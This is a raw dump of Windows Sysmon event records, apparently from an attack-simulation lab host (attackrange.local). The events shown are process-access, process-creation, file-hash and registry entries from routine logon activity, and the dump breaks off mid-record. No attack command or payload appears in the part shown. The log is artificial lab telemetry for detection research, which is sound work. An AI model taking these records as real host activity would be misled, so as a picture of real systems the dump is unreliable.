12:24:42.238{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291838Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.238{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291837Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.238{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291836Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.223{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291835Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.223{BEA10069-0289-6088-042A-00000000BB01}64044680C:\Windows\system32\csrss.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291834Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.223{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C1-6086-0B00-00000000BB01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291833Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.223{BEA10069-D0C1-6086-0B00-00000000BB01}640712C:\Windows\system32\lsass.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291832Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.223{BEA10069-0289-6088-052A-00000000BB01}63403624C:\Windows\system32\winlogon.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+193b7|C:\Windows\system32\winlogon.exe+22617|C:\Windows\system32\winlogon.exe+2b287|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291831Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.223{BEA10069-D0C1-6086-0B00-00000000BB01}640712C:\Windows\system32\lsass.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291830Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.223{BEA10069-D0C1-6086-0B00-00000000BB01}640712C:\Windows\system32\lsass.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291829Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.237{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa39e2055 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e73SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000291828Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.223{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291827Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.223{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291826Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.223{BEA10069-D0C2-6086-1000-00000000BB01}9441656C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291825Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.223{BEA10069-D0C2-6086-1000-00000000BB01}9441656C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+3c53|c:\windows\system32\themeservice.dll+2675|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291824Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.223{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291823Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.223{BEA10069-D0C2-6086-1000-00000000BB01}9441656C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291822Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.223{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291821Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.223{BEA10069-D0C2-6086-1000-00000000BB01}944NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\WindowsUpdate.logMD5=038356387332650843BCB352BB89A101,SHA256=492C9B102256321FB5598FF87ED5BCCAB8159F36DD8416CE4011FFBF5E96048D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291820Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.138{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EA60F9A788303666B06CF32ADDFD5C77,SHA256=D5A050A46F835136C7903F991B75FE277B92BA257B46B1E8F54C561EE4CB9F7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291819Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.138{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=15D012670AF72E4BBB5FBDD53C2765B4,SHA256=F1CD8249E7DC0C21ABB262CF6D7AF1B0B75C211EC60F29EDBC70D645B8DCCF6F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291818Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.123{BEA10069-0289-6088-042A-00000000BB01}64045288C:\Windows\system32\csrss.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\winsrv.DLL+1ef0|C:\Windows\system32\winsrv.DLL+17e9|C:\Windows\system32\winsrv.DLL+1579|C:\Windows\SYSTEM32\ntdll.dll+5178f 13241300x8000000000000000291817Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.060{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\NextInstanceDWORD (0x00000002) 13241300x8000000000000000291816Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.060{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\CountDWORD (0x00000002) 13241300x8000000000000000291815Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.060{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session3Mouse0 13241300x8000000000000000291814Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.060{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000002) 13241300x8000000000000000291813Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.060{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000002) 13241300x8000000000000000291812Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.060{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session3Mouse0 13241300x8000000000000000291811Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.localInvDB-DriverVerSetValue2021-04-27 12:24:42.060{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Control\Class\{4d36e96f-e325-11ce-bfc1-08002be10318}\0003\DriverVersion10.0.14393.0 13241300x8000000000000000291810Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.060{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\NextInstanceDWORD (0x00000002) 13241300x8000000000000000291809Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.060{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\CountDWORD (0x00000002) 13241300x8000000000000000291808Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.060{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session3Keyboard0 13241300x8000000000000000291807Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.060{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000291806Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.060{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000001) 13241300x8000000000000000291805Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.060{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\0TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session3Keyboard0 13241300x8000000000000000291804Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.localInvDB-DriverVerSetValue2021-04-27 12:24:42.060{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Control\Class\{4d36e96b-e325-11ce-bfc1-08002be10318}\0003\DriverVersion10.0.14393.0 23542300x8000000000000000291803Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.022{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8ED3318065FCD1AEB8A6EC31443AB82,SHA256=C7220327A0AE4E04BEC43C31C2147F2267A303353A00DF6E186DEB2AE05397D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291802Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.991{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2387f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291801Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.991{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+2380c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291800Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:41.991{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+237c4|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292500Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.826{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D4AC-6086-4701-00000000BB01}3580C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\Syst